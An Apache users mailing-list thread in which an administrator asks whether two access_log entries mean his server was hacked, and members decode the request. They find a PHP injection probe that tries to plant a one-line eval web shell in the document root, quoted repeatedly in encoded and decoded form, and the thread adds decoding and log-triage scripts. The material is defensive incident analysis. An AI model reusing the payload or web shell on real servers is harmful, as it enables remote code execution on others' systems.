Re: [users@httpd] am i hacked ?
with the current number of critters around probably yes.

E

On 6 February 2017 at 23:05, Wim Lewis wrote:
>
> On 2/6/2017 8:36 AM, Jack Swan wrote:
> > What upsets me is that these two requests have statuscode 200, which
> > means it was successful.
>
> As Jonesy points out, it's normal for the web server to simply ignore a
> request's query-string in a request where it wouldn't mean anything. So
> Apache is happily returning the result of "GET /" and ignoring the
> malicious probe.
>
> If you don't have PHP installed, you're safe from whatever this is. If the
> user your webserver runs as can't write to the documentroot or
> configuration directory, you're safe from whatever this is.
Re: [users@httpd] am i hacked ?
On 2/6/2017 8:36 AM, Jack Swan wrote:
> What upsets me is that these two requests have statuscode 200, which means it
> was successful.

As Jonesy points out, it's normal for the web server to simply ignore a
request's query-string in a request where it wouldn't mean anything. So Apache
is happily returning the result of "GET /" and ignoring the malicious probe.

If you don't have PHP installed, you're safe from whatever this is. If the user
your webserver runs as can't write to the documentroot or configuration
directory, you're safe from whatever this is.
Re: [users@httpd] am i hacked ?
If you have python installed...

The following python script shows some simple commands for decoding (for future
reference).

import urllib.parse
import base64

# The two access_log lines, pasted as quoted from the original mail
# (the "> " prefixes and line wraps come from the mail client).
test = """
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90"""

# Undo the %XX URL-encoding of the query string
print(urllib.parse.unquote(test))

# Decode the base64 literal that the payload hands to base64_decode()
print(base64.b64decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))

It yields...

python unquote.py

/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME
> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME
> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
> HTTP/1.1" 200 90
b'<?php eval($_POST[1]);?>'

I also have a program that attempts to get an email address to notify in the
event of abuse. It yields the following.

python getAbuseEmail.py 91.200.12.33
['n...@lugalink.net']

though it is unlikely you'll get a response ;-)

On 2/6/2017 8:36 AM, Jack Swan wrote:
> I didn't decode it all. I'll leave the rest up to you, but the %characters
> are hexadecimal characters. Look up hex charset.
>
> So the first line translates to (I may have missed a char or two...)
>
> GET/?1=@ini_set("display_errors", 0);set_time_limit("0");@set_magic_quotes_runtime();echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
>
> ----- Original Message -----
> From: bernd.len...@helmholtz-muenchen.de
> To: users@httpd.apache.org
> Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
> Subject: [users@httpd] am i hacked ?
>
> Hi,
>
> just in the moment I found two very weird entries in my access_log:
>
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
>
> What upsets me is that these two requests have statuscode 200, which means it
> was successful.
> The IP is from Ukraine. Where can I find out what these %characters mean ?
> Does anyone understand what happened here ? It's apache 2.2.3 64bit.
>
> Thanks for any hint.
>
> Bernd
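An added example that goes a step beyond the decoding script above (it is not the poster's script, nor anything from the httpd project): it parses a whole access_log line of the format quoted in the thread, URL-decodes the query string, decodes the base64 literal handed to base64_decode(), and reports which PHP code-injection constructs the request carries. It also pulls out the two echo'ed marker strings, because they are what the scanner looks for in the response body to learn whether its code ran; a plain 90-byte index page contains neither, which is the substance of Wim's point about the 200 status. The log-format regex, the indicator list and the sample lines are assumptions: the first sample is the thread's first log entry with the mail client's line wrap removed, the second is a constructed benign request.

```python
"""Triage an access_log line like the ones in this thread.

Added example (not the script from the post above).  Parse the line, URL-decode
the query string, decode any base64_decode('...') literal the payload carries,
and report which PHP code-injection indicators are present.  The log format
(host, ident, user, [time], a number, "request", status, bytes) is assumed
from the lines quoted in the thread.
"""
import base64
import re
import urllib.parse

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] (?P<extra>\d+) '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)$'
)
B64_RE = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
ECHO_RE = re.compile(r"echo\s+'([^']*)'")

# Constructs whose presence in the decoded request marks a PHP injection probe
# (assumed list; extend it for your own environment).
INDICATORS = ("<?php", "eval(", "$_POST", "$_GET", "$_REQUEST",
              "file_put_contents(", "system(", "passthru(", "assert(")

# Constructed sample: the thread's first log line, mail-client line wrap removed.
SAMPLE = (
    '91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1='
    '%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B'
    '%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3B'
    'file_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27'
    '%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3B'
    'echo%20%27%7C%3C-%27%3B HTTP/1.1" 200 90'
)
# Constructed benign line for comparison.
BENIGN = '203.0.113.5 - - [06/Feb/2017:16:50:00 +0100] 12 "GET /index.html HTTP/1.1" 200 90'


def decode_base64_literals(text):
    """Return [(literal, decoded_text)] for every base64_decode('...') in text."""
    found = []
    for lit in B64_RE.findall(text):
        try:
            raw = base64.b64decode(lit, validate=True)
        except ValueError:
            continue  # not valid base64; leave it alone
        found.append((lit, raw.decode("utf-8", "replace")))
    return found


def triage(line):
    """Parse one log line; return a dict of findings, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urllib.parse.urlsplit(m.group("target"))
    query = urllib.parse.unquote(parts.query)
    nested = decode_base64_literals(query)
    haystack = query + "".join(dec for _, dec in nested)
    indicators = [i for i in INDICATORS if i in haystack]
    return {
        "host": m.group("host"),
        "path": parts.path,
        "status": int(m.group("status")),
        "bytes": None if m.group("bytes") == "-" else int(m.group("bytes")),
        "query": query,
        "nested": nested,
        # The echo'ed strings bracket the output the probe expects to see in the
        # response body if its code ran; a response without them (here the
        # 90-byte index page) shows the payload was never executed.
        "markers": ECHO_RE.findall(query),
        "indicators": indicators,
        "verdict": "php code-injection probe" if indicators else "no indicator",
    }


if __name__ == "__main__":
    for ln in (SAMPLE, BENIGN):
        r = triage(ln)
        print(r["host"], r["status"], r["bytes"], r["verdict"], r["markers"])
        for _lit, dec in r["nested"]:
            print("  base64 payload:", dec)
```

Feed it your access_log line by line and grep on the verdict; the status and byte count are kept so the entry can be compared with what a normal "GET /" returns on the same host.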
Re: [users@httpd] am i hacked ?
----- On Feb 6, 2017, at 8:22 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote:

>> OK. I think I understand most of it.
>> First the attacker sets some values appropriate for him. Then he tries to
>> create a file webconfig.txt.php and to write in it.
>> Fortunately wwwrun can't write in /sr/www ... , following
>> http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
>> If he could create the file, then he is able to send arbitrary stuff to it
>> which is executed by eval.
>>
>> Some things are still unclear for me:
>>
>> What is the purpose of the two echos ?
>> Why has the request status code 200 ?
>> What is the purpose of the 1 direct behind the question mark ?
>> What is the 1 in the array $_POST ? Arrays start with index 0, I think (I'm
>> not a php developer).
>>
>
> The @ in front of the function calls silences the errors:
> http://stackoverflow.com/questions/27645422/what-difference-does-usage-of-symbol-with-ini-set-built-in-function-makes-in
>

Beside keeping apache and the OS fresh, what do you think of mod_security and/or
AppArmor as an additional layer of security ? I read that mod_security is quite
complicated.

Bernd
Re: [users@httpd] am i hacked ?
> OK. I think I understand most of it.
> First the attacker sets some values appropriate for him. Then he tries to
> create a file webconfig.txt.php and to write in it.
> Fortunately wwwrun can't write in /sr/www ... , following
> http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
> If he could create the file, then he is able to send arbitrary stuff to it
> which is executed by eval.
>
> Some things are still unclear for me:
>
> What is the purpose of the two echos ?
> Why has the request status code 200 ?
> What is the purpose of the 1 direct behind the question mark ?
> What is the 1 in the array $_POST ? Arrays start with index 0, I think (I'm
> not a php developer).
>

The @ in front of the function calls silences the errors:
http://stackoverflow.com/questions/27645422/what-difference-does-usage-of-symbol-with-ini-set-built-in-function-makes-in
Re: [users@httpd] am i hacked ?
----- On Feb 6, 2017, at 6:32 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote:

> ----- On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote:
>
>> The first line is trying to create the file webconfig.txt.php in your
>> DOCUMENT_ROOT directory, with the contents of the file being:
>>
>> <?php eval($_POST[1]);?>
>>
>> I didn't decode the remaining lines. I think they're just trying to do the
>> same thing.
>>
>
> You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is
> helpful.
>

OK. I think I understand most of it.
First the attacker sets some values appropriate for him. Then he tries to create
a file webconfig.txt.php and to write in it.
Fortunately wwwrun can't write in /sr/www ... , following
http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
If he could create the file, then he is able to send arbitrary stuff to it which
is executed by eval.

Some things are still unclear for me:

What is the purpose of the two echos ?
Why has the request status code 200 ?
What is the purpose of the 1 direct behind the question mark ?
What is the 1 in the array $_POST ? Arrays start with index 0, I think (I'm not
a php developer).

Bernd
Re: [users@httpd] am i hacked ?
On Mon, Feb 6, 2017 at 12:30 PM, Mitchell Krog wrote:
> I see these types of attack strings all the time on Nginx except Nginx gives
> a 403. Apache is notoriously bad with security and giving 200 ok responses
> makes you yourself. A reason I and many other people have switched.
> User support on this list was also non existent when I ran into serious SSL
> problems with 2.4 that until today have been ignored and unanswered.

Was this your serious problem:

    I am hoping someone can please give me a more concise description of what
    the socache_shmcb module is and what it actually does. The documentation at
    https://httpd.apache.org/docs/2.4/mod/mod_socache_shmcb.html is very vague
    and in 2 years has not changed. Google searches do not reveal much
    information other than people on forums saying enable the module for
    better performance and what not. I just cannot get my head around what it
    is actually really designed to do and if one was to use it how to
    configure it. Guess as I said it will first help to know what it actually
    is.
Re: [users@httpd] am i hacked ?
----- On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote:

> The first line is trying to create the file webconfig.txt.php in your
> DOCUMENT_ROOT directory, with the contents of the file being:
>
> <?php eval($_POST[1]);?>
>
> I didn't decode the remaining lines. I think they're just trying to do the
> same thing.
>

You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is
helpful.

Bernd
Re: [users@httpd] am i hacked ?
I see these types of attack strings all the time on Nginx except Nginx gives a
403. Apache is notoriously bad with security and giving 200 ok responses makes
you yourself. A reason I and many other people have switched.

User support on this list was also non existent when I ran into serious SSL
problems with 2.4 that until today have been ignored and unanswered.

On 06 Feb 2017 19:21, "Ken Robinson" wrote:
>
> On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
>
>>> The first line is trying to create the file webconfig.txt.php in your
>>> DOCUMENT_ROOT directory, with the contents of the file being:
>>>
>>> <?php eval($_POST[1]);?>
>>>
>>> I didn't decode the remaining lines. I think they're just trying to do
>>> the same thing.
>>>
>>
>> Fortunately there is no webconfig.txt.php. And all folders in /srv/www
>> belong to root and user wwwrun is not allowed to write there.
>>
>
> What seems to be happening here is that your system is being probed for
> vulnerabilities.
>
> The attacker is sending a payload string to your index.php file in hopes
> that it will not complain and write the string to the file
> webconfig.txt.php which the attacker would then attempt to get to with the
> real hack in the Posted contents. Are there any requests to get to that
> file?
>
> You should make sure you sanitized any input to your index.php and reject
> anything that's not expected.
>
> Ken
Re: [users@httpd] am i hacked ?
On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
>> The first line is trying to create the file webconfig.txt.php in your
>> DOCUMENT_ROOT directory, with the contents of the file being:
>>
>> <?php eval($_POST[1]);?>
>>
>> I didn't decode the remaining lines. I think they're just trying to do the
>> same thing.
>
> Fortunately there is no webconfig.txt.php. And all folders in /srv/www
> belong to root and user wwwrun is not allowed to write there.

What seems to be happening here is that your system is being probed for
vulnerabilities.

The attacker is sending a payload string to your index.php file in hopes that it
will not complain and write the string to the file webconfig.txt.php which the
attacker would then attempt to get to with the real hack in the Posted contents.
Are there any requests to get to that file?

You should make sure you sanitized any input to your index.php and reject
anything that's not expected.

Ken
Re: [users@httpd] am i hacked ?
> The first line is trying to create the file webconfig.txt.php in your
> DOCUMENT_ROOT directory, with the contents of the file being:
>
> <?php eval($_POST[1]);?>
>
> I didn't decode the remaining lines. I think they're just trying to do the
> same thing.
>

Fortunately there is no webconfig.txt.php. And all folders in /srv/www belong to
root and user wwwrun is not allowed to write there.

Bernd
Re: [users@httpd] am i hacked ?
----- On Feb 6, 2017, at 5:45 PM, Daniel dferra...@gmail.com wrote:

> Actually now that I re-read the requests it also looks like a successful
> shellshock attempt.
> Operative system software not updated recently either?
>
> 2017-02-06 17:42 GMT+01:00 Daniel < dferra...@gmail.com > :
>
>> Have you tried to send those requests yourself and see what you get?
>> Still those requests seem to be aimed at your php framework.
>> Do you use a very old php version as well?

Everything is old. php, OS, apache. This is to my account. It's a system I
nearly oversaw, because we use it very rarely. But nevertheless, it should be
updated. I know. And I learn.

>>> What I find out already:
>>> https://url-encoder.de/ helped me to decode the URL:
>>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
>>> '->|';file_put_contents($_SERVER['DOCUME
>>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
>>> '|<-';
>>>
>>> Currently I don't understand what this means.
>>> I don't find a file webconfig.txt.php on my system.
>>> Currently no weird process, no new user in /etc/passwd, no packets to the
>>> network which includes this ip.
>>>
>>> Thankful for any tip.
Re: [users@httpd] am i hacked ?
The first line is trying to create the file webconfig.txt.php in your
DOCUMENT_ROOT directory, with the contents of the file being:

<?php eval($_POST[1]);?>

I didn't decode the remaining lines. I think they're just trying to do the same
thing.

----- Original Message -----
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:41:13 AM GMT -05:00 US/Canada Eastern
Subject: Re: [users@httpd] am i hacked ?

----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote:

> Hi,
>
> just in the moment I found two very weird entries in my access_log:
>
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
>
> What upsets me is that these two requests have statuscode 200, which means it
> was successful.
> The IP is from Ukraine. Where can I find out what these %characters mean ?
> Does anyone understand what happened here ? It's apache 2.2.3 64bit.
>
> Thanks for any hint.
>
> Bernd
>

What I find out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
'->|';file_put_contents($_SERVER['DOCUME
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
'|<-';

Currently I don't understand what this means.
I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packets to the
network which includes this ip.

Thankful for any tip.

Bernd
Re: [users@httpd] am i hacked ?
Actually now that I re-read the requests it also looks like a successful
shellshock attempt.
Operative system software not updated recently either?

2017-02-06 17:42 GMT+01:00 Daniel:
> Have you tried to send those requests yourself and see what you get?
>
> Still those requests seem to be aimed at your php framework.
>
> Do you use a very old php version as well?
>
> 2017-02-06 17:41 GMT+01:00 Lentes, Bernd:
>>
>> ----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-muenchen.de wrote:
>>
>> > Hi,
>> >
>> > just in the moment I found two very weird entries in my access_log:
>> >
>> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
>> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
>> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>> > HTTP/1.1" 200 90
>> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
>> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
>> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>> > HTTP/1.1" 200 90
>> >
>> > What upsets me is that these two requests have statuscode 200, which
>> > means it was successful.
>> > The IP is from Ukraine. Where can I find out what these %characters
>> > mean ? Does anyone understand what happened here ? It's apache 2.2.3 64bit.
>> >
>> > Thanks for any hint.
>> >
>> > Bernd
>> >
>>
>> What I find out already:
>> https://url-encoder.de/ helped me to decode the URL:
>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
>> '->|';file_put_contents($_SERVER['DOCUME
>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
>> '|<-';
>>
>> Currently I don't understand what this means.
>> I don't find a file webconfig.txt.php on my system.
>> Currently no weird process, no new user in /etc/passwd, no packets to the
>> network which includes this ip.
>>
>> Thankful for any tip.
>>
>>
>> Bernd
>>

--
Daniel Ferradal
IT Specialist

email dferradal at gmail.com
linkedin es.linkedin.com/in/danielferradal
Re: [users@httpd] am i hacked ?
Have you tried to send those requests yourself and see what you get?

Still those requests seem to be aimed at your php framework.

Do you use a very old php version as well?

2017-02-06 17:41 GMT+01:00 Lentes, Bernd:
>
> ----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-muenchen.de wrote:
>
> > Hi,
> >
> > just in the moment I found two very weird entries in my access_log:
> >
> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> > HTTP/1.1" 200 90
> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> > HTTP/1.1" 200 90
> >
> > What upsets me is that these two requests have statuscode 200, which
> > means it was successful.
> > The IP is from Ukraine. Where can I find out what these %characters
> > mean ? Does anyone understand what happened here ? It's apache 2.2.3 64bit.
> >
> > Thanks for any hint.
> >
> > Bernd
> >
>
> What I find out already:
> https://url-encoder.de/ helped me to decode the URL:
> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
> '->|';file_put_contents($_SERVER['DOCUME
> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
> '|<-';
>
> Currently I don't understand what this means.
> I don't find a file webconfig.txt.php on my system.
> Currently no weird process, no new user in /etc/passwd, no packets to the
> network which includes this ip.
>
> Thankful for any tip.
>
>
> Bernd
>
Re: [users@httpd] am i hacked ?
----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote:

> Hi,
>
> just in the moment I found two very weird entries in my access_log:
>
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
>
> What upsets me is that these two requests have statuscode 200, which means it
> was successful.
> The IP is from Ukraine. Where can I find out what these %characters mean ?
> Does anyone understand what happened here ? It's apache 2.2.3 64bit.
>
> Thanks for any hint.
>
> Bernd
>

What I find out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
'->|';file_put_contents($_SERVER['DOCUME
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
'|<-';

Currently I don't understand what this means.
I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packets to the
network which includes this ip.

Thankful for any tip.

Bernd
Re: [users@httpd] am i hacked ?
I didn't decode it all. I'll leave the rest up to you, but the %characters are
hexadecimal characters. Look up hex charset.

So the first line translates to (I may have missed a char or two...)

GET/?1=@ini_set("display_errors", 0);set_time_limit("0");@set_magic_quotes_runtime();echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';

----- Original Message -----
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: [users@httpd] am i hacked ?

Hi,

just in the moment I found two very weird entries in my access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
HTTP/1.1" 200 90

What upsets me is that these two requests have statuscode 200, which means it
was successful.
The IP is from Ukraine. Where can I find out what these %characters mean ? Does
anyone understand what happened here ? It's apache 2.2.3 64bit.

Thanks for any hint.

Bernd
[users@httpd] am i hacked ?
Hi,

just in the moment I found two very weird entries in my access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
HTTP/1.1" 200 90

What upsets me is that these two requests have statuscode 200, which means it
was successful.
The IP is from Ukraine. Where can I find out what these %characters mean ? Does
anyone understand what happened here ? It's apache 2.2.3 64bit.

Thanks for any hint.

Bernd

--
Bernd Lentes
Systemadministration
institute of developmental genetics
Building 35.34 - Room 208
HelmholtzZentrum München
bernd.len...@helmholtz-muenchen.de
phone: +49 (0)89 3187 1241
fax: +49 (0)89 3187 2294

Only once you commit yourself to something can you be wrong
Scott Adams

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Chair of the Supervisory Board: MinDir'in Baerbel Brumme-Bothe
Managing Directors: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Court of registration: Amtsgericht Muenchen HRB 6466
VAT ID: DE 129521671

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org